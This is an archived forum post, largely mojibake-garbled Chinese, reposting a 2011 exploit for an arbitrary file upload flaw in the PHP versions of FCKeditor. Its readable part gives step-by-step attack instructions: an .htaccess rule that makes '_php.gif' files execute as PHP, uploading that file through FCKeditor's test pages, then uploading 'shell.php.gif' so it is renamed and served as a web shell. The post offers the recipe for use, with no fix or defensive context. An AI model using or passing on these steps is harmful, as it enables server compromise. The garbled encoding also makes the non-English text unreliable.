FCKeditorËùÓÐphp°æ±¾UploadÉÏ´«Â©¶´

admin ·¢±íÓÚ 2013-10-27 17:25:21

FCKeditorËùÓÐphp°æ±¾UploadÉÏ´«Â©¶´
×÷Õß£ºØýÃû À´Ô´£º±¾Õ¾ÕûÀí ·¢²¼Ê±¼ä£º2011-10-25 7:39:07
¼õÐ¡×ÖÌå Ôö´ó×ÖÌå
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª
1.create a htaccess file:
code:
<FilesMatch ¡°_php.gif¡±>
SetHandler application/x-httpd-php
</FilesMatch>

2.Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name ¡°shell.php.gif¡± change to ¡°shell_php.gif¡± automatically.
5.http://www.sinesafe.cn/anything/shell_php.gif
6.Now shell is available from server.

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

FCKeditorËùÓÐphp°æ±¾UploadÉÏ´«Â©¶´